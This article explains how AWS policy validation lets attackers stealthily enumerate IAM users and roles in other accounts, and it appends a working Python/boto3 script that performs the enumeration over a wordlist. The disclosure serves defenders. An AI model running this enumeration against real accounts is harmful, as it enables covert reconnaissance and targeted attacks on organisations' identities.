Attackers can abuse AWS APIs to enumerate the IAM users and roles of other accounts.
Unit 42 researchers have discovered a class of Amazon Web Services (AWS) APIs that are vulnerable to abuse. Abusing them lets an attacker enumerate the AWS Identity and Access Management (IAM) users and roles in arbitrary accounts.
Amazon Simple Storage Service (S3), AWS Key Management Service (KMS) and Amazon Simple Queue Service (SQS) are among the AWS services whose APIs can be abused this way.
How attackers use the technique
It starts with the attacker obtaining the roster of an account, that is, the list of IAM users and roles it contains. With the roster in hand, the attacker can learn the organization's internal structure and launch targeted attacks against individual identities.
In a recent Red Team exercise, Unit 42 researchers compromised a customer’s cloud account with thousands of workloads. They did this using a misconfigured IAM role identified by this technique.
The root cause of the issue is that the AWS backend proactively validates every resource-based policy attached to a resource such as an Amazon Simple Storage Service (S3) bucket or a customer-managed KMS key.
Resource-based policies usually include a Principal field that specifies the identities (users or roles) allowed to access the resource. If the policy names an identity that does not exist, the API call that creates or updates the policy fails with an error message saying the principal is invalid. If the identity does exist, the call succeeds.
Resource-based policies provide an entry point
For legitimate users this validation is convenient. However, attackers can abuse it to check whether a given identity exists in any AWS account. They can invoke these APIs repeatedly from an account they control, naming a different principal each time, to identify the users and roles in a targeted account.
To make matters worse, the targeted account cannot observe this user and role enumeration. The API calls, and the errors they produce, are logged only in the account the attacker uses to manipulate the resource policies; nothing is recorded in the target account.
This "stealthy" property of the technique makes detection and prevention difficult, according to Unit 42. Attackers can take as much time as they need to perform reconnaissance on random or targeted AWS accounts without worrying that an admin will notice.
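The following script illustrates the probing loop described above. It is an added example, not Unit 42's tooling or code from the original article. It works from the attacker's own account: for each candidate name it builds a bucket policy whose Principal is an ARN in the target account, attempts to attach it with PutBucketPolicy, and classifies the outcome. The target account ID, the probe bucket name and the wordlist are constructed placeholders, and the assumption that S3 rejects a nonexistent principal with error code `MalformedPolicy` and a message containing "Invalid principal in policy" is marked in the code. The policy construction and error classification run offline; the real call needs boto3 and credentials for the attacker's account.

```python
"""Added example: enumerating IAM users/roles in another account by
attaching a bucket policy in the attacker's own account and watching
whether AWS rejects the Principal. Not the original page's code."""
import json

TARGET_ACCOUNT = "123456789012"   # constructed: the account being probed
PROBE_BUCKET = "attacker-probe-bucket"   # constructed: a bucket the attacker owns


def principal_arn(account_id, kind, name):
    """Build the ARN of an IAM user or role in account_id.
    Wildcards are not allowed inside a Principal ARN, so each probe
    must name one exact identity; enumeration relies on a wordlist."""
    if kind not in ("user", "role"):
        raise ValueError("kind must be 'user' or 'role'")
    return f"arn:aws:iam::{account_id}:{kind}/{name}"


def build_probe_policy(principal, bucket):
    """A minimal bucket policy naming one principal. AWS validates that
    the Principal exists regardless of Action/Resource, so a Deny is used
    to make sure a successful put grants nothing to the probed identity."""
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "Probe",
            "Effect": "Deny",
            "Principal": {"AWS": principal},
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
        }],
    })


def classify(error_code, message):
    """Map a PutBucketPolicy outcome to 'exists', 'missing' or 'unknown'.
    Assumption: a nonexistent principal yields code 'MalformedPolicy' with
    a message containing 'Invalid principal'. Anything else (throttling,
    AccessDenied on the probe bucket, ...) is reported as unknown rather
    than being guessed either way."""
    if error_code is None:
        return "exists"
    if error_code == "MalformedPolicy" and "Invalid principal" in message:
        return "missing"
    return "unknown"


def probe(principal, bucket=PROBE_BUCKET, client=None):
    """Attempt the put against the attacker's bucket; return (code, message).
    Requires boto3 and credentials for the attacker-controlled account."""
    import boto3
    from botocore.exceptions import ClientError

    s3 = client or boto3.client("s3")
    try:
        s3.put_bucket_policy(Bucket=bucket,
                             Policy=build_probe_policy(principal, bucket))
        s3.delete_bucket_policy(Bucket=bucket)  # remove the policy after a hit
        return None, ""
    except ClientError as exc:
        err = exc.response.get("Error", {})
        return err.get("Code"), err.get("Message", "")


def enumerate_principals(names, kind="role", account_id=TARGET_ACCOUNT,
                         prober=probe):
    """Return the names from the wordlist that exist in the target account.
    `prober` is injectable so the logic can be exercised without AWS access."""
    found = []
    for name in names:
        outcome = classify(*prober(principal_arn(account_id, kind, name)))
        if outcome == "exists":
            found.append(name)
    return found


if __name__ == "__main__":
    # Constructed wordlist of common role names.
    WORDLIST = ["Admin", "OrganizationAccountAccessRole", "DeployRole"]
    print(enumerate_principals(WORDLIST))
```

Every probe is a PutBucketPolicy call on the attacker's bucket, so the only CloudTrail record lands in the attacker's account, which is exactly the property the article describes. The same loop works against a KMS key policy (PutKeyPolicy) or an SQS queue policy (SetQueueAttributes) with the corresponding error codes substituted in `classify`.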